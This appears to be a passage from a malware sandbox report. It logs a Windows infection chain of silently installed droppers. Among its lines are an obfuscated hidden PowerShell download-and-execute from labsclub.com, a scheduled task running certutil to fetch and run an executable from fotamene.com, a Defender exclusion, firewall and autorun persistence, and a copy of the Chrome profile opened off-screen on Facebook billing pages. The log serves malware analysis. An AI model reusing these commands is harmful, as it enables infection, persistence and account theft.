C:\Users\Admin\AppData\Roaming\roz5jpjjqre\s1kajgjgass.exe"C:\Users\Admin\AppData\Roaming\roz5jpjjqre\s1kajgjgass.exe" /VERYSILENT /p=testparams9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4540 -
C:\Users\Admin\AppData\Local\Temp\is-UNLGV.tmp\s1kajgjgass.tmp"C:\Users\Admin\AppData\Local\Temp\is-UNLGV.tmp\s1kajgjgass.tmp" /SL5="$7003A,552809,216064,C:\Users\Admin\AppData\Roaming\roz5jpjjqre\s1kajgjgass.exe" /VERYSILENT /p=testparams10⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\i2u0omn3lm5\v0utu55kp5k.exe"C:\Users\Admin\AppData\Local\Temp\i2u0omn3lm5\v0utu55kp5k.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4488 -
C:\Users\Admin\AppData\Local\Temp\is-KMJ3R.tmp\v0utu55kp5k.tmp"C:\Users\Admin\AppData\Local\Temp\is-KMJ3R.tmp\v0utu55kp5k.tmp" /SL5="$8019A,870426,780800,C:\Users\Admin\AppData\Local\Temp\i2u0omn3lm5\v0utu55kp5k.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4616 -
C:\Users\Admin\AppData\Local\Temp\is-G4L35.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-G4L35.tmp\winlthst.exe" test1 test110⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\okIlmH3je.exe"C:\Users\Admin\AppData\Local\Temp\okIlmH3je.exe"11⤵PID:14280
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:5084
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:11444
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bsvizygcwtc\vict.exe"C:\Users\Admin\AppData\Local\Temp\bsvizygcwtc\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4528 -
C:\Users\Admin\AppData\Local\Temp\is-IJS0E.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-IJS0E.tmp\vict.tmp" /SL5="$50032,870426,780800,C:\Users\Admin\AppData\Local\Temp\bsvizygcwtc\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4688 -
C:\Users\Admin\AppData\Local\Temp\is-PTLMR.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-PTLMR.tmp\wimapi.exe" 53510⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2912 -
C:\Users\Admin\AppData\Local\Temp\2xQlq1W93.exe"C:\Users\Admin\AppData\Local\Temp\2xQlq1W93.exe"11⤵PID:13036
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:5568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:11044
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mt2wpw2i1x0\0q1glrb1rdq.exe"C:\Users\Admin\AppData\Local\Temp\mt2wpw2i1x0\0q1glrb1rdq.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:4556 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "0q1glrb1rdq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mt2wpw2i1x0\0q1glrb1rdq.exe" & exit9⤵PID:5588
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "0q1glrb1rdq.exe" /f10⤵
- Kills process with taskkill
PID:4612
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0xhj25hdwmj\n1ml530obys.exe"C:\Users\Admin\AppData\Local\Temp\0xhj25hdwmj\n1ml530obys.exe" 57a764d042bf88⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4672 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\HS4Y2D8D1I\HS4Y2D8D1.exe" 57a764d042bf8 & exit9⤵PID:5332
-
C:\Program Files\HS4Y2D8D1I\HS4Y2D8D1.exe"C:\Program Files\HS4Y2D8D1I\HS4Y2D8D1.exe" 57a764d042bf810⤵PID:6104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ltbzvp3lhl1\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\ltbzvp3lhl1\askinstall24.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4716 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:4644
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:5396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cqdns1h0v2a\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\cqdns1h0v2a\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4708 -
C:\Users\Admin\AppData\Local\Temp\is-PH500.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-PH500.tmp\Setup3310.tmp" /SL5="$102CC,802346,56832,C:\Users\Admin\AppData\Local\Temp\cqdns1h0v2a\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4464 -
C:\Users\Admin\AppData\Local\Temp\is-OVAG0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-OVAG0.tmp\Setup.exe" /Verysilent10⤵PID:5696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mzb3crvcows\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\mzb3crvcows\chashepro3.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4700 -
C:\Users\Admin\AppData\Local\Temp\is-7N8RI.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-7N8RI.tmp\chashepro3.tmp" /SL5="$102DE,1478410,58368,C:\Users\Admin\AppData\Local\Temp\mzb3crvcows\chashepro3.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4432
-
-
-
C:\Users\Admin\AppData\Local\Temp\v5uibkdvqnd\app.exe"C:\Users\Admin\AppData\Local\Temp\v5uibkdvqnd\app.exe" /8-238⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3772 -
C:\Program Files (x86)\Nameless-Grass\7za.exe"C:\Program Files (x86)\Nameless-Grass\7za.exe" e -p154.61.71.51 winamp-plugins.7z9⤵PID:4536
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Nameless-Grass\app.exe" -map "C:\Program Files (x86)\Nameless-Grass\WinmonProcessMonitor.sys""9⤵PID:1336
-
C:\Program Files (x86)\Nameless-Grass\app.exe"C:\Program Files (x86)\Nameless-Grass\app.exe" -map "C:\Program Files (x86)\Nameless-Grass\WinmonProcessMonitor.sys"10⤵PID:4648
-
-
-
C:\Program Files (x86)\Nameless-Grass\7za.exe"C:\Program Files (x86)\Nameless-Grass\7za.exe" e -p154.61.71.51 winamp.7z9⤵PID:8476
-
-
C:\Program Files (x86)\Nameless-Grass\app.exe"C:\Program Files (x86)\Nameless-Grass\app.exe" /8-239⤵PID:8980
-
C:\Program Files (x86)\Nameless-Grass\app.exe"C:\Program Files (x86)\Nameless-Grass\app.exe" /8-2310⤵PID:6688
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"11⤵PID:11584
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes12⤵PID:11788
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2311⤵PID:4836
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F12⤵
- Creates scheduled task(s)
PID:10936
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F12⤵
- Creates scheduled task(s)
PID:11716
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c0m2ttwc1ww\vpn.exe"C:\Users\Admin\AppData\Local\Temp\c0m2ttwc1ww\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4156
-
-
C:\Users\Admin\AppData\Local\Temp\cfngdyvq1yc\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\cfngdyvq1yc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4740
-
-
C:\Users\Admin\AppData\Local\Temp\gzbiwizyzx2\vict.exe"C:\Users\Admin\AppData\Local\Temp\gzbiwizyzx2\vict.exe" /VERYSILENT /id=5358⤵PID:11624
-
C:\Users\Admin\AppData\Local\Temp\is-BGJO3.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-BGJO3.tmp\vict.tmp" /SL5="$50608,870426,780800,C:\Users\Admin\AppData\Local\Temp\gzbiwizyzx2\vict.exe" /VERYSILENT /id=5359⤵PID:10776
-
C:\Users\Admin\AppData\Local\Temp\is-S2M6N.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-S2M6N.tmp\wimapi.exe" 53510⤵PID:6160
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5muvo0emqtg\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\5muvo0emqtg\Setup3310.exe" /Verysilent /subid=5778⤵PID:9120
-
C:\Users\Admin\AppData\Local\Temp\is-UB4NO.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-UB4NO.tmp\Setup3310.tmp" /SL5="$A0436,802346,56832,C:\Users\Admin\AppData\Local\Temp\5muvo0emqtg\Setup3310.exe" /Verysilent /subid=5779⤵PID:7680
-
C:\Users\Admin\AppData\Local\Temp\is-HR5SV.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-HR5SV.tmp\Setup.exe" /Verysilent10⤵PID:4496
-
C:\Users\Admin\AppData\Local\Temp\is-H6G61.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-H6G61.tmp\Setup.tmp" /SL5="$20A16,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-HR5SV.tmp\Setup.exe" /Verysilent11⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\is-FVCDR.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-FVCDR.tmp\PictureLAb.exe" /Verysilent12⤵PID:2908
-
C:\Users\Admin\AppData\Local\Temp\is-HIG93.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-HIG93.tmp\PictureLAb.tmp" /SL5="$10B08,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-FVCDR.tmp\PictureLAb.exe" /Verysilent13⤵PID:11996
-
C:\Users\Admin\AppData\Local\Temp\is-0PFT7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0PFT7.tmp\Setup.exe" /VERYSILENT14⤵PID:10756
-
C:\Users\Admin\AppData\Local\Temp\is-2VBNB.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-2VBNB.tmp\Setup.tmp" /SL5="$C042C,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-0PFT7.tmp\Setup.exe" /VERYSILENT15⤵PID:10112
-
C:\Users\Admin\AppData\Local\Temp\is-UPOUF.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-UPOUF.tmp\def.exe" /S /UID=lab21416⤵PID:11072
-
C:\Users\Admin\AppData\Local\Temp\b0-609a7-7cd-f2eb1-5a2272c576423\Paelelushako.exe"C:\Users\Admin\AppData\Local\Temp\b0-609a7-7cd-f2eb1-5a2272c576423\Paelelushako.exe"17⤵PID:7260
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kx1uvk50.jhx\lod.exe & exit18⤵PID:7652
-
C:\Users\Admin\AppData\Local\Temp\kx1uvk50.jhx\lod.exeC:\Users\Admin\AppData\Local\Temp\kx1uvk50.jhx\lod.exe19⤵PID:10544
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo HQxchYwhQ20⤵PID:2460
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Riconobbe.xlt20⤵PID:12456
-
C:\Windows\SysWOW64\cmd.execmd21⤵PID:13220
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xxu03b0e.vjw\customer4.exe & exit18⤵PID:10916
-
C:\Users\Admin\AppData\Local\Temp\xxu03b0e.vjw\customer4.exeC:\Users\Admin\AppData\Local\Temp\xxu03b0e.vjw\customer4.exe19⤵PID:8092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ordisbfg.y2g\askinstall18.exe & exit18⤵PID:1108
-
C:\Users\Admin\AppData\Local\Temp\ordisbfg.y2g\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\ordisbfg.y2g\askinstall18.exe19⤵PID:12704
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe20⤵PID:4196
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe21⤵
- Kills process with taskkill
PID:11812
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y20⤵PID:9480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/20⤵PID:14196
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffe20d06e00,0x7ffe20d06e10,0x7ffe20d06e2021⤵PID:14220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,4788990259822640121,13324253143724654434,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1660 /prefetch:821⤵PID:9932
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hkowsue2.dp4\md7_7dfj.exe & exit18⤵PID:7360
-
C:\Users\Admin\AppData\Local\Temp\hkowsue2.dp4\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\hkowsue2.dp4\md7_7dfj.exe19⤵PID:9324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d2ycgepn.lwv\privacytools5.exe & exit18⤵PID:12868
-
C:\Users\Admin\AppData\Local\Temp\d2ycgepn.lwv\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\d2ycgepn.lwv\privacytools5.exe19⤵PID:12832
-
C:\Users\Admin\AppData\Local\Temp\d2ycgepn.lwv\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\d2ycgepn.lwv\privacytools5.exe20⤵PID:13508
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1kfreog2.moy\GcleanerWW.exe /mixone & exit18⤵PID:12260
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5a15mnyx.1gu\setup.exe /8-2222 & exit18⤵PID:13836
-
C:\Users\Admin\AppData\Local\Temp\5a15mnyx.1gu\setup.exeC:\Users\Admin\AppData\Local\Temp\5a15mnyx.1gu\setup.exe /8-222219⤵PID:9800
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Wild-Glade"20⤵PID:13960
-
-
C:\Program Files (x86)\Wild-Glade\7za.exe"C:\Program Files (x86)\Wild-Glade\7za.exe" e -p154.61.71.51 winamp-plugins.7z20⤵PID:9140
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Wild-Glade\setup.exe" -map "C:\Program Files (x86)\Wild-Glade\WinmonProcessMonitor.sys""20⤵PID:11004
-
C:\Program Files (x86)\Wild-Glade\setup.exe"C:\Program Files (x86)\Wild-Glade\setup.exe" -map "C:\Program Files (x86)\Wild-Glade\WinmonProcessMonitor.sys"21⤵PID:12056
-
-
-
C:\Program Files (x86)\Wild-Glade\7za.exe"C:\Program Files (x86)\Wild-Glade\7za.exe" e -p154.61.71.51 winamp.7z20⤵PID:12568
-
-
C:\Program Files (x86)\Wild-Glade\setup.exe"C:\Program Files (x86)\Wild-Glade\setup.exe" /8-222220⤵PID:13088
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d0p4rfuw.1uv\MultitimerFour.exe & exit18⤵PID:14060
-
C:\Users\Admin\AppData\Local\Temp\d0p4rfuw.1uv\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\d0p4rfuw.1uv\MultitimerFour.exe19⤵PID:8876
-
C:\Users\Admin\AppData\Local\Temp\MLR47K2G1H\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MLR47K2G1H\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10420⤵PID:13456
-
C:\Users\Admin\AppData\Local\Temp\MLR47K2G1H\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MLR47K2G1H\multitimer.exe" 1 3.1615300245.604786955d38b 10421⤵PID:14116
-
C:\Users\Admin\AppData\Local\Temp\MLR47K2G1H\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MLR47K2G1H\multitimer.exe" 2 3.1615300245.604786955d38b22⤵PID:7916
-
C:\Users\Admin\AppData\Local\Temp\o2lzhc2wzdx\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\o2lzhc2wzdx\askinstall24.exe"23⤵PID:12712
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe24⤵PID:12120
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe25⤵
- Kills process with taskkill
PID:10340
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y24⤵PID:8324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/24⤵PID:9600
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xd8,0xf8,0x7ffe20d06e00,0x7ffe20d06e10,0x7ffe20d06e2025⤵PID:6964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1644,1799357132583343076,9238236819860626844,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1684 /prefetch:825⤵PID:6080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1ro1lbpbbmf\vict.exe"C:\Users\Admin\AppData\Local\Temp\1ro1lbpbbmf\vict.exe" /VERYSILENT /id=53523⤵PID:7752
-
C:\Users\Admin\AppData\Local\Temp\is-5325P.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-5325P.tmp\vict.tmp" /SL5="$60AE6,870426,780800,C:\Users\Admin\AppData\Local\Temp\1ro1lbpbbmf\vict.exe" /VERYSILENT /id=53524⤵PID:14020
-
C:\Users\Admin\AppData\Local\Temp\is-2N7UR.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-2N7UR.tmp\wimapi.exe" 53525⤵PID:13732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rc5t4d5mwpk\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\rc5t4d5mwpk\chashepro3.exe" /VERYSILENT23⤵PID:9288
-
C:\Users\Admin\AppData\Local\Temp\is-GLPR7.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-GLPR7.tmp\chashepro3.tmp" /SL5="$7073C,1478410,58368,C:\Users\Admin\AppData\Local\Temp\rc5t4d5mwpk\chashepro3.exe" /VERYSILENT24⤵PID:12296
-
-
-
C:\Users\Admin\AppData\Local\Temp\xslmohogwzf\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\xslmohogwzf\Setup3310.exe" /Verysilent /subid=57723⤵PID:11600
-
C:\Users\Admin\AppData\Local\Temp\is-JHUBU.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-JHUBU.tmp\Setup3310.tmp" /SL5="$20C8C,802346,56832,C:\Users\Admin\AppData\Local\Temp\xslmohogwzf\Setup3310.exe" /Verysilent /subid=57724⤵PID:7392
-
C:\Users\Admin\AppData\Local\Temp\is-PQ25P.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PQ25P.tmp\Setup.exe" /Verysilent25⤵PID:2464
-
C:\Users\Admin\AppData\Local\Temp\is-0RQA5.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-0RQA5.tmp\Setup.tmp" /SL5="$30D76,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PQ25P.tmp\Setup.exe" /Verysilent26⤵PID:6956
-
C:\Users\Admin\AppData\Local\Temp\is-ITDER.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-ITDER.tmp\PictureLAb.exe" /Verysilent27⤵PID:13144
-
C:\Users\Admin\AppData\Local\Temp\is-F1CA1.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-F1CA1.tmp\PictureLAb.tmp" /SL5="$10F9E,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-ITDER.tmp\PictureLAb.exe" /Verysilent28⤵PID:14064
-
C:\Users\Admin\AppData\Local\Temp\is-ANH94.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-ANH94.tmp\Setup.exe" /VERYSILENT29⤵PID:2980
-
C:\Users\Admin\AppData\Local\Temp\is-GAEL2.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-GAEL2.tmp\Setup.tmp" /SL5="$30DC4,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-ANH94.tmp\Setup.exe" /VERYSILENT30⤵PID:4272
-
C:\Users\Admin\AppData\Local\Temp\is-7RDJ6.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-7RDJ6.tmp\def.exe" /S /UID=lab21431⤵PID:6080
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-ITDER.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-ITDER.tmp\Delta.exe" /Verysilent27⤵PID:15340
-
C:\Users\Admin\AppData\Local\Temp\is-BVD2E.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-BVD2E.tmp\Delta.tmp" /SL5="$20FDE,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-ITDER.tmp\Delta.exe" /Verysilent28⤵PID:14552
-
C:\Users\Admin\AppData\Local\Temp\is-ITJKA.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-ITJKA.tmp\Setup.exe" /VERYSILENT29⤵PID:9460
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-ITJKA.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit30⤵PID:13048
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f31⤵
- Kills process with taskkill
PID:15116
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-ITDER.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-ITDER.tmp\zznote.exe" /Verysilent27⤵PID:14644
-
C:\Users\Admin\AppData\Local\Temp\is-GMID7.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-GMID7.tmp\zznote.tmp" /SL5="$60DF0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-ITDER.tmp\zznote.exe" /Verysilent28⤵PID:11284
-
C:\Users\Admin\AppData\Local\Temp\is-1LMPM.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-1LMPM.tmp\jg4_4jaa.exe" /silent29⤵PID:12900
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tck4tct4rek\ustrpoirgvq.exe"C:\Users\Admin\AppData\Local\Temp\tck4tct4rek\ustrpoirgvq.exe" /ustwo INSTALL23⤵PID:12700
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ustrpoirgvq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\tck4tct4rek\ustrpoirgvq.exe" & exit24⤵PID:13616
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ustrpoirgvq.exe" /f25⤵
- Kills process with taskkill
PID:8584
-
-
-
-
